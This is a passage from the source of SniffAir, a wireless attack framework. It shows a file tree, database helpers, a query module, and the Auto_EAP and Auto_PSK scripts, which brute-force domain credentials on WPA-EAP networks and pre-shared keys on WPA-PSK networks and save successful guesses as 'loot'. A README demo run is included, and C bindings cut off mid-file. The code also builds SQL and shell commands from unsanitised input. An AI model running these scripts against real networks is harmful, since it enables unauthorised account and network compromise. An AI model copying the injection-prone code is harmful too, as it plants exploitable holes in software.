├── .gitattributes ├── LICENSE ├── README.md ├── SniffAir.py ├── banner ├── db └── .keep ├── lib ├── Connect2DB.py ├── Queries.py └── Sniffer.py ├── module ├── AP_Hunter.py ├── Auto_EAP │ ├── Auto_EAP.py │ ├── Auto_PSK.py │ ├── README.md │ ├── RunMeFirst.py │ ├── lib │ │ ├── Makefile │ │ ├── build │ │ │ ├── lib.linux-x86_64-2.7 │ │ │ │ └── wpaspy.so │ │ │ ├── src │ │ │ │ ├── common │ │ │ │ │ └── wpa_ctrl.o │ │ │ │ └── utils │ │ │ │ │ └── os_unix.o │ │ │ └── temp.linux-x86_64-2.7 │ │ │ │ └── wpaspy.o │ │ ├── setup.py │ │ ├── wpa_supplicant.conf │ │ ├── wpaspy.c │ │ └── wpaspy.py │ └── src │ │ ├── common │ │ ├── Makefile │ │ ├── defs.h │ │ ├── eapol_common.h │ │ ├── gas.c │ │ ├── gas.h │ │ ├── ieee802_11_common.c │ │ ├── ieee802_11_common.h │ │ ├── ieee802_11_defs.h │ │ ├── privsep_commands.h │ │ ├── sae.c │ │ ├── sae.h │ │ ├── version.h │ │ ├── wpa_common.c │ │ ├── wpa_common.h │ │ ├── wpa_ctrl.c │ │ └── wpa_ctrl.h │ │ └── utils │ │ ├── Makefile │ │ ├── base64.c │ │ ├── base64.h │ │ ├── bitfield.c │ │ ├── bitfield.h │ │ ├── build_config.h │ │ ├── common.c │ │ ├── common.h │ │ ├── edit.c │ │ ├── edit.h │ │ ├── edit_readline.c │ │ ├── edit_simple.c │ │ ├── eloop.c │ │ ├── eloop.h │ │ ├── eloop_none.c │ │ ├── eloop_win.c │ │ ├── ext_password.c │ │ ├── ext_password.h │ │ ├── ext_password_i.h │ │ ├── ext_password_test.c │ │ ├── includes.h │ │ ├── ip_addr.c │ │ ├── ip_addr.h │ │ ├── list.h │ │ ├── os.h │ │ ├── os_internal.c │ │ ├── os_none.c │ │ ├── os_unix.c │ │ ├── os_win32.c │ │ ├── pcsc_funcs.c │ │ ├── pcsc_funcs.h │ │ ├── radiotap.c │ │ ├── radiotap.h │ │ ├── radiotap_iter.h │ │ ├── state_machine.h │ │ ├── trace.c │ │ ├── trace.h │ │ ├── uuid.c │ │ ├── uuid.h │ │ ├── wpa_debug.c │ │ ├── wpa_debug.h │ │ ├── wpabuf.c │ │ └── wpabuf.h ├── Captive_Portal │ ├── cisco │ │ ├── images │ │ │ ├── background.jpg │ │ │ ├── cisco.gif │ │ │ └── favicon.ico │ │ ├── index.html │ │ ├── login.html │ │ └── static │ │ │ └── favicon.ico │ ├── dns.log │ ├── dnsmasq.conf │ └── server.py ├── Discover_Hidden_SSID.py ├── Handshaker │ ├── Handshaker.py │ └── cap2hccapx.bin ├── MAC_Changer.py ├── Probe_Packet.py ├── SSID_stat.py ├── Suspicious_AP.py ├── export.py ├── gtc │ ├── PuNk1n.patch │ ├── clients.conf │ └── eap.conf ├── hostapd-wpe │ ├── README │ ├── certs │ │ ├── 01.pem │ │ ├── Makefile │ │ ├── README │ │ ├── bootstrap │ │ ├── ca.cnf │ │ ├── ca.der │ │ ├── ca.key │ │ ├── ca.pem │ │ ├── cert.py │ │ ├── client.cnf │ │ ├── demoCA │ │ │ └── cacert.pem │ │ ├── dh │ │ ├── index.txt │ │ ├── index.txt.attr │ │ ├── index.txt.old │ │ ├── random │ │ ├── serial │ │ ├── serial.old │ │ ├── server.cnf │ │ ├── server.crt │ │ ├── server.csr │ │ ├── server.key │ │ ├── server.p12 │ │ ├── server.pem │ │ └── xpextensions │ └── hostapd-wpe.patch ├── hostapd.py ├── proof_packet.py ├── wigleSearchBSSID.py └── wigleSearchESSID.py ├── requirements.txt └── setup.sh /.gitattributes: -------------------------------------------------------------------------------- 1 | module/* linguist-vendored 2 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2017 Matthew Eidelberg 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /banner: -------------------------------------------------------------------------------- 1 | % * ., % 2 | % ( ,# (..# % 3 | /@@@@@&, *@@% &@, @@# /@@@@@@@@@ .@@@@@@@@@. ,/ # # (%%%* % (.(. .@@ &@@@@@@%. 4 | .@@& *&@ %@@@@. &@, @@% %@@,,,,,,, ,@@,,,,,,, .( % % %%# # % # ,@@ @@(,,,#@@@. 5 | %@% %@@(@@. &@, @@% %@@ ,@@ /* # /*, %.,, ,@@ @@* #@@ 6 | ,@@& %@@ ,@@* &@, @@% %@@ ,@@ .# //#(, (, ,@@ @@* &@% 7 | .@@@@@. %@@ .@@( &@, @@% %@@%%%%%%* ,@@%%%%%%# (# ##. ,@@ @@&%%%@@@% 8 | *@@@@ %@@ .@@/ &@, @@% %@@,,,,,, ,@@,,,,,,. %#####% ,@@ @@(,,%@@% 9 | @@% %@@ @@( &@, @@% %@@ ,@@ % (*/ # ,@@ @@* @@@ 10 | %@% %@@ @@&&@, @@% %@@ ,@@ % # .# .# ,@@ @@* @@% 11 | .@@&/,,#@@@ %@@ &@@@, @@% %@@ ,@@ /(* /(# ,@@ @@* @@# 12 | *%@@@&* *%# ,%# #%/ *%# %% #############. .%# #%. .%% 13 | (@Tyl0us & @theDarracott) 14 | -------------------------------------------------------------------------------- /db/.keep: -------------------------------------------------------------------------------- 1 | 2 | -# Ignore everything in this directory 3 | -* 4 | -# Except this file 5 | -!.gitignore 6 | 7 | -------------------------------------------------------------------------------- /lib/Connect2DB.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import sys 4 | import os 5 | import subprocess 6 | import sqlite3 7 | from sqlite3 import Error 8 | from Connect2DB import * 9 | from tabulate import tabulate 10 | import pandas as dp 11 | 12 | 13 | def db_name(workspace): 14 | global db_file 15 | db_file = workspace 16 | 17 | def create_connection(): 18 | """ create a database connection to a SQLite database """ 19 | try: 20 | conn = sqlite3.connect(db_file) 21 | conn.execute('''CREATE TABLE accessPoints 22 | (ESSID, BSSID, VENDOR, CHAN, PWR, ENC, CIPHER, AUTH)''') 23 | conn.execute('''CREATE TABLE ProbeRequests 24 | (ESSID, CLIENT, VENDOR, PWR)''') 25 | conn.execute('''CREATE TABLE ProbeResponses 26 | (ESSID, BSSID, VENDOR, CHAN, PWR, ENC, CIPHER, AUTH, CLIENT)''') 27 | conn.execute('''CREATE TABLE EAP 28 | (SRC_MAC, USERNAME, BSSID)''') 29 | conn.execute('''CREATE TABLE INSCOPE_SSIDS 30 | (ESSID)''') 31 | conn.execute('''CREATE TABLE LOOT 32 | (MAC, USERNAME, PASSWORD)''') 33 | except Error as e: 34 | conn.close() 35 | finally: 36 | conn.close() 37 | 38 | 39 | def list(): 40 | db_list = str(os.listdir('db/'))[1:-1].replace('.db','').replace(',','').replace('\'','').split() 41 | dbl=[] 42 | for p in db_list: 43 | dbl.append("workspace load "+p) 44 | 45 | def display_list(): 46 | dl = str(os.listdir('db/'))[1:-1].replace(',','').replace('\'','') 47 | frame = dp.DataFrame(dl.split()) 48 | print tabulate(frame, showindex=False, headers=['Workspaces'], tablefmt='psql') 49 | 50 | 51 | def delete_workspace(workspace): 52 | subprocess.call('rm -rf db/'+workspace, shell=True) 53 | 54 | def connect_db(): 55 | global connection 56 | connection = sqlite3.connect(db_file, check_same_thread=False) 57 | connection.text_factory = str 58 | 59 | class load(): 60 | def __init__(self): 61 | pass 62 | 63 | def begin(self): 64 | connection.execute("BEGIN TRANSACTION") 65 | 66 | def insert_ACCESS_POINT(self, SSID, MAC, VENDOR, CHL, SIG, ENC, CHR, ATH): 67 | connection.execute("insert into accessPoints (ESSID, BSSID, VENDOR, CHAN, PWR, ENC, CIPHER, AUTH) values (?,?,?,?,?,?,?,?)", (SSID, MAC, VENDOR, CHL, SIG, ENC, CHR, ATH)) 68 | 69 | def Insert_Probe_REQUEST(self, SSID, MAC, VENDOR, SIG): 70 | connection.execute("insert into ProbeRequests (ESSID, CLIENT, VENDOR, PWR) values (?,?,?,?)", (SSID, MAC, VENDOR, SIG)) 71 | 72 | def Insert_Probe_RESPONSE(self, SSID, MAC, VENDOR, CHL, SIG, ENC, CHR, ATH, RPCM): 73 | connection.execute("insert into ProbeResponses (ESSID, BSSID, VENDOR, CHAN, PWR, ENC, CIPHER, AUTH, CLIENT) values (?,?,?,?,?,?,?,?,?)", (SSID, MAC, VENDOR, CHL, SIG, ENC, CHR, ATH, RPCM)) 74 | 75 | 76 | def Insert_EAP(self, sender, user, ap): 77 | connection.execute("insert into EAP (SRC_MAC, USERNAME, BSSID) values (?,?,?)", (sender, user, ap)) 78 | 79 | def Close(self): 80 | connection.commit() 81 | connection.close() -------------------------------------------------------------------------------- /module/AP_Hunter.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import sqlite3 3 | import pandas as dp 4 | import pandas 5 | import Queries 6 | from Queries import * 7 | 8 | class colors: 9 | RD = '\033[91m' 10 | NRM = '\033[0m' 11 | 12 | def main(workspace): 13 | ws = workspace 14 | q = queries() 15 | ws1 = q.db_connect(ws) 16 | query=dp.read_sql('select * from accessPoints', ws1) 17 | inscope=dp.read_sql('select * from INSCOPE_SSIDS', ws1) 18 | result = inscope.to_string(formatters={'ESSID':'{{:<{}s}}'.format(inscope['ESSID'].str.len().max()).format}, header=False, index=False) 19 | ENC = "OPEN" 20 | PWR = "-100" 21 | notssids = result.replace('\n','\' and ESSID not like \'') 22 | count = 1 23 | print "AP Hunter - Displays Access Points within a specific range, using a specific encrpytion type. These may be benign." 24 | print "-------------------------------------------------------------------------------------------------------------------------------------------" 25 | while count <=2: 26 | try: 27 | print "ENC currently set to: " + ENC + " and PWR currently set to: " + PWR +". Press Enter to see these results or to set the values either type ENC or PWR and then the value. Note that when setting the PWR you must include a \'-\'" 28 | input = raw_input(" >>") 29 | varible = input.split(' ') 30 | if varible[0] == 'ENC': 31 | ENC = varible[1] 32 | if varible[0] == 'PWR': 33 | PWR = varible[1] 34 | if ENC and PWR: 35 | AP_HT = dp.read_sql("select * from accessPoints where ESSID not like '"+ notssids +"' and ENC = '"+ENC+"' and PWR >='"+PWR+"'", ws1) 36 | if AP_HT.empty: 37 | print colors.RD + "Query returned no valid results, please try again.\n" + colors.NRM 38 | else: 39 | print (tabulate (AP_HT, showindex=False, headers=query.columns, tablefmt="psql")) 40 | print "To exit press Ctl+C" 41 | except KeyboardInterrupt: 42 | count = 3 43 | print "\033[1A" -------------------------------------------------------------------------------- /module/Auto_EAP/Auto_EAP.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | #Author: Tylous 4 | 5 | #Auto_EAP.py is a script designed to perform automated brute-force authentication attacks against various types of EAP networks. 6 | #Using the python library wpaspy, created by Jouni Malinen to interact with the wpa_supplicant damon, 7 | #automated authentication attacks can be preformed with the intent of not causing account lock-outs. 8 | 9 | 10 | 11 | import argparse 12 | import time 13 | import wpaspy 14 | import os 15 | import sys 16 | sys.path.insert(0, '../../lib/') 17 | from Queries import * 18 | import pandas as dp 19 | import sqlite3 20 | 21 | parser = argparse.ArgumentParser() 22 | parser.add_argument('-i', '--interface', metavar='Interface', dest='interface', action='store', help='The Interface to use\n', required=True) 23 | parser.add_argument('-s', '--ssid', metavar='SSID', dest='ssid', action='store', help='The SSID to attack', required=True) 24 | parser.add_argument('-U', '--User', metavar='Usernamefile', dest='usernamefile', action='store', help='Path to username file\n', required=False) 25 | parser.add_argument('-W', '--workspace', metavar='workspace', dest='workspace', action='store', help='Workspace name\n', required=False) 26 | parser.add_argument('-p', '--password', metavar='Password', dest='password', action='store', help='Password to use\n', required=True) 27 | parser.add_argument('-K', '--key_mgmt', metavar='Key_mgmt', dest='key_mgmt', action='store', help='Key_Management type to use\n', required=True) 28 | parser.add_argument('-E', '--eap_type', metavar='Eap_type', dest='eap_type', action='store', help='Eap type to use\n', required=True) 29 | args = parser.parse_args() 30 | 31 | 32 | 33 | wpas_ctrl = '/var/run/wpa_supplicant' 34 | 35 | #Sets the wpa_supplicant conf, CLI interpreter and the interface to be used#### 36 | def wpas_connect(): 37 | os.system('wpa_supplicant -i' + args.interface +' -c lib/wpa_supplicant.conf -K -B > /dev/null') 38 | ifaces = [] 39 | if os.path.isdir(wpas_ctrl): 40 | try: 41 | ifaces = [os.path.join(wpas_ctrl, i) for i in os.listdir(wpas_ctrl)] 42 | except OSError, error: 43 | print "Could not find wpa_supplicant: ", error 44 | return None 45 | 46 | if len(ifaces) < 1: 47 | print "No wpa_supplicant control interface found" 48 | return None 49 | 50 | for ctrl in ifaces: 51 | try: 52 | wpas = wpaspy.Ctrl(ctrl) 53 | return wpas 54 | except Exception, e: 55 | pass 56 | return None 57 | 58 | 59 | #Configures the supplicant and performs the automated attack# 60 | def main(): 61 | try: 62 | failed = ('\033[91m' + 'FAILED' + '\033[0m') 63 | success = ('\033[92m' + 'SUCCESS' + '\033[0m') 64 | password = (args.password) 65 | print "Initialized..." 66 | wpa = wpas_connect() 67 | if wpa is None: 68 | return 69 | wpa.attach() 70 | wpa.request('ADD_NETWORK') 71 | wpa.request('SET_NETWORK 0 ssid "' + args.ssid + '"') 72 | wpa.request('SET_NETWORK 0 key_mgmt ' + args.key_mgmt +' ') 73 | wpa.request('SET_NETWORK 0 eap ' + args.eap_type +' ') 74 | 75 | if bool(args.usernamefile): 76 | try: 77 | f = open(args.usernamefile) 78 | usernames = f.readlines() 79 | except IOError: 80 | print "Can't read "+args.usernamefile 81 | sys.exit(1) 82 | 83 | else: 84 | #if bool(args.workspace): 85 | try: 86 | con = sqlite3.connect('../../'+args.workspace) 87 | if dp.read_sql('select USERNAME from EAP', con).empty: 88 | print "No usernames found in EAP table, please try a different option." 89 | sys.exit(1) 90 | else: 91 | usernames = dp.read_sql('select USERNAME from EAP', con).to_string(justify='left', index=False, header=False).replace(" ","").split('\n') 92 | 93 | except dp.io.sql.DatabaseError: 94 | print "can't read SQL" 95 | sys.exit(1) 96 | #else: 97 | # username = (args.username) 98 | #LOoper# 99 | for username in usernames: 100 | wpa.request('SET_NETWORK 0 identity "' + username.rstrip(os.linesep) + '"') 101 | wpa.request('SET_NETWORK 0 anonymous_identity "' + username.rstrip(os.linesep) + '"') 102 | wpa.request('SET_NETWORK 0 password "' + password + '"') 103 | wpa.request('ENABLE_NETWORK 0') 104 | sys.stdout.write ('Trying Username ' + username.rstrip(os.linesep) + ' with Password ' + password + ': ') 105 | wpa.request('LOGON') 106 | time.sleep(4) 107 | count= 0 108 | while count < 10: 109 | count +=1 110 | time.sleep(1) 111 | while wpa.pending(): 112 | resp = wpa.recv() 113 | if 'CTRL-EVENT-EAP-SUCCESS EAP authentication completed successfully' in resp: 114 | print success 115 | loot = {'MAC': '','Password': '','Username': ''} 116 | loot.update(MAC = "N/A") 117 | loot.update(Password = password) 118 | loot.update(Username = username.rstrip(os.linesep)) 119 | d = queries() 120 | d.db_connect('../../'+args.workspace) 121 | d.loot(loot) 122 | count=11 123 | break 124 | if 'CTRL-EVENT-EAP-FAILURE EAP authentication failed' in resp: 125 | print failed 126 | count=11 127 | break 128 | if count == 10: 129 | print failed 130 | wpa.request('DISABLE_NETWORK 0') 131 | time.sleep(2) 132 | wpa.request('REMOVE_NETWORK 0') 133 | print 'Completed' 134 | wpa.detach() 135 | wpa.request('TERMINATE') 136 | except KeyboardInterrupt: 137 | wpa.request('TERMINATE') 138 | time.sleep(2) 139 | print '\n' 140 | print 'Shutting Down' 141 | if __name__ == "__main__": 142 | main() 143 | sys.exit(0) 144 | -------------------------------------------------------------------------------- /module/Auto_EAP/Auto_PSK.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | #Author: Tylous 4 | 5 | #Auto_PSK.py is a script designed to perform automated brute-force authentication attacks against Preshared Key networks. 6 | #Using the python library wpaspy, created by Jouni Malinen to interact with the wpa_supplicant damon, 7 | 8 | 9 | 10 | import argparse 11 | import time 12 | import wpaspy 13 | import os 14 | import sys 15 | sys.path.insert(0, '../../lib/') 16 | from Queries import * 17 | import pandas as dp 18 | import sqlite3 19 | 20 | parser = argparse.ArgumentParser() 21 | parser.add_argument('-i', '--interface', metavar='Interface', dest='interface', action='store', help='The Interface to use\n', required=True) 22 | parser.add_argument('-s', '--ssid', metavar='SSID', dest='ssid', action='store', help='The SSID to attack', required=True) 23 | parser.add_argument('-W', '--workspace', metavar='workspace', dest='workspace', action='store', help='Workspace name\n', required=False) 24 | parser.add_argument('-P', '--passwordfile', metavar='Passwordfile', dest='Passwordfile', action='store', help='Password to use\n', required=False) 25 | parser.add_argument('-p', '--password', metavar='Password', dest='password', action='store', help='Password to use\n', required=False) 26 | args = parser.parse_args() 27 | 28 | 29 | 30 | wpas_ctrl = '/var/run/wpa_supplicant' 31 | 32 | #Sets the wpa_supplicant conf, CLI interpreter and the interface to be used#### 33 | def wpas_connect(): 34 | os.system('wpa_supplicant -i' + args.interface +' -c lib/wpa_supplicant.conf -K -B > /dev/null') 35 | ifaces = [] 36 | if os.path.isdir(wpas_ctrl): 37 | try: 38 | ifaces = [os.path.join(wpas_ctrl, i) for i in os.listdir(wpas_ctrl)] 39 | except OSError, error: 40 | print "Could not find wpa_supplicant: ", error 41 | return None 42 | 43 | if len(ifaces) < 1: 44 | print "No wpa_supplicant control interface found" 45 | return None 46 | 47 | for ctrl in ifaces: 48 | try: 49 | wpas = wpaspy.Ctrl(ctrl) 50 | return wpas 51 | except Exception, e: 52 | pass 53 | return None 54 | 55 | 56 | #Configures the supplicant and performs the automated attack# 57 | def main(): 58 | try: 59 | failed = ('\033[91m' + 'FAILED' + '\033[0m') 60 | success = ('\033[92m' + 'SUCCESS' + '\033[0m') 61 | #password = (args.password) 62 | print "Initialized..." 63 | wpa = wpas_connect() 64 | if wpa is None: 65 | return 66 | wpa.attach() 67 | wpa.request('ADD_NETWORK') 68 | wpa.request('SET_NETWORK 0 ssid "' + args.ssid + '"') 69 | 70 | if bool(args.Passwordfile): 71 | try: 72 | f = open(args.Passwordfile) 73 | passwords = f.readlines() 74 | except IOError: 75 | print "Can't read "+args.Passwordfile 76 | sys.exit(1) 77 | else: 78 | password = args.Password 79 | 80 | 81 | #LOoper# 82 | for password in passwords: 83 | wpa.request('SET_NETWORK 0 psk "' + password.rstrip(os.linesep) + '"') 84 | sys.stdout.write ('Trying password: ' + password.rstrip(os.linesep)+' ') 85 | wpa.request('ENABLE_NETWORK 0') 86 | wpa.request('LOGON') 87 | time.sleep(4) 88 | count= 0 89 | while count < 10: 90 | count +=1 91 | time.sleep(1) 92 | while wpa.pending(): 93 | resp = wpa.recv() 94 | if 'CTRL-EVENT-CONNECTED' in resp: 95 | print success 96 | loot = {'MAC': '','Password': '','Username': ''} 97 | loot.update(MAC = "N/A") 98 | loot.update(Password = password) 99 | loot.update(Username = args.ssid) 100 | d = queries() 101 | d.db_connect('../../'+args.workspace) 102 | d.loot(loot) 103 | return 104 | if 'CTRL-EVENT-SSID-TEMP-DISABLED' in resp: 105 | print failed 106 | count=11 107 | break 108 | if count == 10: 109 | print failed 110 | wpa.request('LOGOFF') 111 | wpa.request('DISABLE_NETWORK 0') 112 | time.sleep(2) 113 | wpa.request('REMOVE_NETWORK 0') 114 | print 'Completed' 115 | wpa.detach() 116 | wpa.request('TERMINATE') 117 | except KeyboardInterrupt: 118 | wpa.request('TERMINATE') 119 | time.sleep(2) 120 | print '\n' 121 | print 'Shutting Down' 122 | if __name__ == "__main__": 123 | main() 124 | sys.exit(0) 125 | -------------------------------------------------------------------------------- /module/Auto_EAP/README.md: -------------------------------------------------------------------------------- 1 | # Auto_EAP 2 | 3 | ## Introduction 4 | ----- 5 | ######Published Sepetember 15, 2016 6 | 7 | Auto_EAP.py is a script designed to perform automated brute-force authentication attacks against various types of EAP networks. These types of wireless networks provide an interface to facilitate password guessing of domain credentials as radius servers check authentication against Active Directory. Using the python library wpaspy, created by [Jouni Malinen ] (https://github.com/jmalinen/hostap/tree/master/wpaspy) 8 | to interact with the wpa_supplicant daemon, automated authentication attacks can be preformed with the intent of not causing account lock-outs. 9 | 10 | ## Demo 11 | ----- 12 | 13 | ``` 14 | ./Auto_EAP.py -s HoneyPot -K WPA-EAP -E PEAP -U test.txt -p Summer2016 -i wlan0 15 | Initialized... 16 | Trying Username Alice with Password test: SUCCESS 17 | Trying Username Bob with Password test: FAILED 18 | Trying Username Charles with Password test: FAILED 19 | Trying Username David with Password test: SUCCESS 20 | Completed 21 | 22 | ``` 23 | 24 | ## Installation 25 | ----- 26 | 27 | Run 'RunMeFirst.py' within the root directory of Auto_EAP. This will compile the wpaspy library as well as setup a stand alone wpa_supplicant.conf file that Auto_EAP.py will use for testing, leaving the system’s wpa_supplicant config file untouched. 28 | 29 | ## Help 30 | ----- 31 | 32 | ``` 33 | ./Auto_EAP.py -h 34 | usage: Auto_EAP.py [-h] -i Interface -s SSID -U Usernamefile -p Password -K 35 | Key_mgmt -E Eap_type 36 | 37 | optional arguments: 38 | -h, --help show this help message and exit 39 | -i Interface, --interface Interface 40 | The Interface to use 41 | -s SSID, --ssid SSID The SSID to attack 42 | -U Usernamefile, --User Usernamefile 43 | Path to username file 44 | -p Password, --password Password 45 | Password to use 46 | -K Key_mgmt, --key_mgmt Key_mgmt 47 | Key_Management type to use 48 | -E Eap_type, --eap_type Eap_type 49 | Eap type to use 50 | 51 | ``` 52 | 53 | ## Todo list 54 | ----- 55 | * [✓] Resoved bug with .a type wireless cards (Shout out to [Havok0x90] (https://twitter.com/havok0x90) for his help in resolving this issue) 56 | * [-] Add multi-threading functionality 57 | * [-] Add support for password lists 58 | 59 | 60 | -------------------------------------------------------------------------------- /module/Auto_EAP/RunMeFirst.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import os 3 | import sys 4 | 5 | os.system (' make -C lib/') 6 | os.system (' make install -C lib/') 7 | -------------------------------------------------------------------------------- /module/Auto_EAP/lib/Makefile: -------------------------------------------------------------------------------- 1 | all: build 2 | 3 | SRC=wpaspy.c 4 | 5 | build: $(SRC) setup.py 6 | python setup.py build 7 | 8 | install: 9 | python setup.py install 10 | 11 | clean: 12 | python setup.py clean 13 | rm -f *~ 14 | rm -rf build 15 | -------------------------------------------------------------------------------- /module/Auto_EAP/lib/build/lib.linux-x86_64-2.7/wpaspy.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Tylous/SniffAir/3dfbc2db650ff47cf10d8cbf089881405f08e6f4/module/Auto_EAP/lib/build/lib.linux-x86_64-2.7/wpaspy.so -------------------------------------------------------------------------------- /module/Auto_EAP/lib/build/src/common/wpa_ctrl.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Tylous/SniffAir/3dfbc2db650ff47cf10d8cbf089881405f08e6f4/module/Auto_EAP/lib/build/src/common/wpa_ctrl.o -------------------------------------------------------------------------------- /module/Auto_EAP/lib/build/src/utils/os_unix.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Tylous/SniffAir/3dfbc2db650ff47cf10d8cbf089881405f08e6f4/module/Auto_EAP/lib/build/src/utils/os_unix.o -------------------------------------------------------------------------------- /module/Auto_EAP/lib/build/temp.linux-x86_64-2.7/wpaspy.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Tylous/SniffAir/3dfbc2db650ff47cf10d8cbf089881405f08e6f4/module/Auto_EAP/lib/build/temp.linux-x86_64-2.7/wpaspy.o -------------------------------------------------------------------------------- /module/Auto_EAP/lib/setup.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # Python bindings for wpa_ctrl (wpa_supplicant/hostapd control interface) 4 | # Copyright (c) 2013, Jouni Malinen 5 | # 6 | # This software may be distributed under the terms of the BSD license. 7 | # See README for more details. 8 | 9 | from distutils.core import setup, Extension 10 | 11 | ext = Extension(name = 'wpaspy', 12 | sources = ['../src/common/wpa_ctrl.c', 13 | '../src/utils/os_unix.c', 14 | 'wpaspy.c'], 15 | extra_compile_args = ["-I../src/common", 16 | "-I../src/utils", 17 | "-DCONFIG_CTRL_IFACE", 18 | "-DCONFIG_CTRL_IFACE_UNIX"]) 19 | 20 | setup(name = 'wpaspy', 21 | ext_modules = [ext], 22 | description = 'Python bindings for wpa_ctrl (wpa_supplicant/hostapd)') 23 | -------------------------------------------------------------------------------- /module/Auto_EAP/lib/wpa_supplicant.conf: -------------------------------------------------------------------------------- 1 | ctrl_interface=/run/wpa_supplicant/ 2 | update_config=1 3 | -------------------------------------------------------------------------------- /module/Auto_EAP/lib/wpaspy.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Python bindings for wpa_ctrl (wpa_supplicant/hostapd control interface) 3 | * Copyright (c) 2013, Jouni Malinen 4 | * 5 | * This software may be distributed under the terms of the BSD license. 6 | * See README for more details. 7 | */ 8 | 9 | #include 10 | #include 11 | 12 | #include "wpa_ctrl.h" 13 | 14 | 15 | struct wpaspy_obj { 16 | PyObject_HEAD 17 | struct wpa_ctrl *ctrl; 18 | int attached; 19 | }; 20 | 21 | static PyObject *wpaspy_error; 22 | 23 | 24 | static int wpaspy_open(struct wpaspy_obj *self, PyObject *args) 25 | { 26 | const char *path; 27 | 28 | if (!PyArg_ParseTuple(args, "s", &path)) 29 | return -1; 30 | self->ctrl = wpa_ctrl_open(path); 31 | if (self->ctrl == NULL) 32 | return -1; 33 | self->attached = 0; 34 | return 0; 35 | } 36 | 37 | 38 | static void wpaspy_close(struct wpaspy_obj *self) 39 | { 40 | if (self->ctrl) { 41 | if (self->attached) 42 | wpa_ctrl_detach(self->ctrl); 43 | wpa_ctrl_close(self->ctrl); 44 | self->ctrl = NULL; 45 | } 46 | 47 | if (self->ob_type) 48 | self->ob_type->tp_free((PyObject *) self); 49 | } 50 | 51 | 52 | static PyObject * wpaspy_request(struct wpaspy_obj *self, PyObject *args) 53 | { 54 | const char *cmd; 55 | char buf[4096]; 56 | size_t buflen; 57 | int ret; 58 | 59 | if (!PyArg_ParseTuple(args, "s", &cmd)) 60 | return NULL; 61 | 62 | buflen = sizeof(buf) - 1; 63 | ret = wpa_ctrl_request(self->ctrl, cmd, strlen(cmd), buf, &buflen, 64 | NULL); 65 | if (ret == -2) { 66 | PyErr_SetString(wpaspy_error, "Request timed out"); 67 | return NULL; 68 | } 69 | if (ret) { 70 | PyErr_SetString(wpaspy_error, "Request failed"); 71 | return NULL; 72 | } 73 | 74 | buf[buflen] = '\0'; 75 | return Py_BuildValue("s", buf); 76 | } 77 | 78 | 79 | static PyObject * wpaspy_attach(struct wpaspy_obj *self) 80 | { 81 | int ret; 82 | 83 | if (self->attached) 84 | Py_RETURN_NONE; 85 | 86 | ret = wpa_ctrl_attach(self->ctrl); 87 | if (ret) { 88 | PyErr_SetString(wpaspy_error, "Attach failed"); 89 | return NULL; 90 | } 91 | Py_RETURN_NONE; 92 | } 93 | 94 | 95 | static PyObject * wpaspy_detach(struct wpaspy_obj *self) 96 | { 97 | int ret; 98 | 99 | if (!self->attached) 100 | Py_RETURN_NONE; 101 | 102 | ret = wpa_ctrl_detach(self->ctrl); 103 | if (ret) { 104 | PyErr_SetString(wpaspy_error, "Detach failed"); 105 | return NULL; 106 | } 107 | Py_RETURN_NONE; 108 | } 109 | 110 | 111 | static PyObject * wpaspy_pending(struct wpaspy_obj *self) 112 | { 113 | switch (wpa_ctrl_pending(self->ctrl)) { 114 | case 1: 115 | Py_RETURN_TRUE; 116 | case 0: 117 | Py_RETURN_FALSE; 118 | default: 119 | PyErr_SetString(wpaspy_error, "wpa_ctrl_pending failed"); 120 | break; 121 | } 122 | 123 | return NULL; 124 | } 125 | 126 | 127 | static PyObject * wpaspy_recv(struct wpaspy_obj *self) 128 | { 129 | int ret; 130 | char buf[4096]; 131 | size_t buflen; 132 | 133 | buflen = sizeof(buf) - 1; 134 | Py_BEGIN_ALLOW_THREADS 135 | ret = wpa_ctrl_recv(self->ctrl, buf, &buflen); 136 | Py_END_ALLOW_THREADS 137 | 138 | if (ret) { 139 | PyErr_SetString(wpaspy_error, "wpa_ctrl_recv failed"); 140 | return NULL; 141 | } 142 | 143 | buf[buflen] = '\0'; 144 | return Py_BuildValue("s", buf); 145 | } 146 | 147 | 148 | static PyMethodDef wpaspy_methods[] = { 149 | { 150 | "request", (PyCFunction) wpaspy_request, METH_VARARGS, 151 | "Send a control interface command and return response" 152 | }, 153 | { 154 | "attach", (PyCFunction) wpaspy_attach, METH_NOARGS, 155 | "Attach as an event monitor" 156 | }, 157 | { 158 | "detach", (PyCFunction) wpaspy_detach, METH_NOARGS, 159 | "Detach an event monitor" 160 | }, 161 | { 162 | "pending", (PyCFunction) wpaspy_pending, METH_NOARGS, 163 | "Check whether any events are pending" 164 | }, 165 | { 166 | "recv", (PyCFunction) wpaspy_recv, METH_NOARGS, 167 | 